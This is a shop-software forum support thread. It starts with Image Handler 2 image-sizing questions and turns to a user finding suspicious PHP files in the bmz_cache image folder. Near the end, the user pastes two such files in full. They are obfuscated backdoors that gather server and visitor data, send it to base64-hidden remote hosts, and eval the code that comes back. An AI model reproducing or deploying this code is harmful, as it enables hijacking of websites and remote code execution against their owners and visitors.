Re: Image Handler 2 Support
Thanks for your help guys - the images are all definately jpegs
Quote:
play with the percentage and instead of 60% try 33% or something like that just to check out the theory
or remove your restrictions to see if it behaves properly and try to do the sdjustment in store admin/configuration/images for both the regular image sizes and the ih2 section.
I tried playing with the percentages but the images are still short and fat in IE (except once I double click the images they return to normal proportions!?).
Once I removed the restrictions from the style sheet the images started to display in Google Chrome
Quote:
This sounds like a browser specific issue with Chrome
Yep looks like it.
The only problem with removing the restrictions and altering the image sizes in admin is that it also makes the 'products also purchased sizes' the same size which is way too small - which is the reason I put the restrictions in the style sheet.
Any ideas on how I can get the additional images smaller without affecting the products also purchased size?
Many Thanks
Craig
Re: Image Handler 2 Support
Quote:
Originally Posted by
Craig Robbo
Thanks for your help guys - the images are all definately jpegs
I tried playing with the percentages but the images are still short and fat in IE (except once I double click the images they return to normal proportions!?).
Once I removed the restrictions from the style sheet the images started to display in Google Chrome
Yep looks like it.
The only problem with removing the restrictions and altering the image sizes in admin is that it also makes the 'products also purchased sizes' the same size which is way too small - which is the reason I put the restrictions in the style sheet.
Any ideas on how I can get the additional images smaller without affecting the products also purchased size?
Many Thanks
Craig
Honestly no:no:.. Plus, the answer to this question is off-topic for this particular support thread, as it is really not an IH2 issue..
Re: Image Handler 2 Support
Quote:
Originally Posted by
kenny724
No one ever answered my question. :( I'll try again. If you go to
www.midsouthcoin.com/midsouthcoin store and click on say small cents category on the left...then click of one of the items, and then click on the large image.....the background gets messed if if you scroll down. Can some look and give me advice on the...click on the large image and scroll up and down on the page with your mouse wheel? Thanks.
I'm using Fual Lightbox with IH2 and have had no problems EVER using these two together.. I'm fairly certain the issue has everything to do with something being wrong with your Fual install..
Re: Image Handler 2 Support
I played around with the code and fixed it. Trial and error. Set the height at 100%. Just another question though...i know there is a maximum image size....do you know what file would control the MINIMUM image size if there is one? Would like all the images to come up the same size. Thanks.
Re: Image Handler 2 Support
Hi Zenners,
I have been noticing recently that when viewing whos online through admin i have been noticing weird links (inparticular when visited by yahoo bot) such as:
/bmz_cache/amazing-cover-letter-creator-torrent.html
This is just one that i saw recently there have been others
Now i know that bmz_cache is part of image handler and whenever i click on the links i get 404 page not found and there is nothing in the bmz cache folder relating to any html documents.
I also only started to see these weird links when i installed simple SEO.
Anyone have any idea of what this could be?
Re: Image Handler 2 Support
Quote:
Originally Posted by
gee38l
Hi Zenners,
I have been noticing recently that when viewing whos online through admin i have been noticing weird links (inparticular when visited by yahoo bot) such as:
/bmz_cache/amazing-cover-letter-creator-torrent.html
This is just one that i saw recently there have been others
Now i know that bmz_cache is part of image handler and whenever i click on the links i get 404 page not found and there is nothing in the bmz cache folder relating to any html documents.
I also only started to see these weird links when i installed simple SEO.
Anyone have any idea of what this could be?
bmz_cache is for the images cache to help load the pages quicker and is where the images info is stored for easier editing of the images too.
go to the server and check the actual folder...see if there is any html files in there and download and remove them.
look at them in a text editor Notepad++ is great to do this with and see what its contents are.
Have you done your security updates for the cart?
post what the files have to say too, if there are any. Also jot down the ip addresses I just checked mine and there are several spider bots and google bots in there proweling...lol however all the clickable links are for my store products and not another spot...maybe a screen shot of the page too.
1 Attachment(s)
Re: Image Handler 2 Support
Quote:
Originally Posted by
DarkAngel
bmz_cache is for the images cache to help load the pages quicker and is where the images info is stored for easier editing of the images too.
go to the server and check the actual folder...see if there is any html files in there and download and remove them.
look at them in a text editor Notepad++ is great to do this with and see what its contents are.
Have you done your security updates for the cart?
post what the files have to say too, if there are any. Also jot down the ip addresses I just checked mine and there are several spider bots and google bots in there proweling...lol however all the clickable links are for my store products and not another spot...maybe a screen shot of the page too.
There are no HTML files in the bmz_cache folder.
All i see is pics and a few php files.
As far as im aware im up to date in terms of security patches.
I have attached a pic of my admin area (whos online)
Re: Image Handler 2 Support
Quote:
Originally Posted by
gee38l
There are no HTML files in the bmz_cache folder.
All i see is pics and a few php files.
As far as im aware im up to date in terms of security patches.
I have attached a pic of my admin area (whos online)
ty for the screenshot, I forget they don't get larger around here when attached but no matter.
In the bmz_cache folder there should only be more folders with each containing image files...either a mixture of .gif, .png and .jpg or all .jpg if you only use that type.
having php files in the image files is something to look into. what names do they have, download and remove them for any php in image file folders may mean a possible hack attempt, that is how they like to hide their hijacking files or their files to gather info that they do not need.
post name of file and using the # button in the posting window show us what the content is to really be able to determine whether you need to worry.
as I said image folder with .php files or .img files where there are only supposed to be .php files is a concern unless you yourself put them there.
Re: Image Handler 2 Support
Quote:
Originally Posted by
DarkAngel
ty for the screenshot, I forget they don't get larger around here when attached but no matter.
In the bmz_cache folder there should only be more folders with each containing image files...either a mixture of .gif, .png and .jpg or all .jpg if you only use that type.
having php files in the image files is something to look into. what names do they have, download and remove them for any php in image file folders may mean a possible hack attempt, that is how they like to hide their hijacking files or their files to gather info that they do not need.
post name of file and using the # button in the posting window show us what the content is to really be able to determine whether you need to worry.
as I said image folder with .php files or .img files where there are only supposed to be .php files is a concern unless you yourself put them there.
Filename of one of the files is: 176374.php
Here is the file content:
Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="c48e2ab95421b0e6b25c6c84ccb93622") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Re: Image Handler 2 Support
There is another file called: 81431.php
Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="1c9c141af20b84fdd184f973d11cd773") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
In the BMZ_CACHE folder i have alot of folders a - f and 0 - 9 i looked thorugh every folder and it seems that most of them had a few php files similar to the two above.....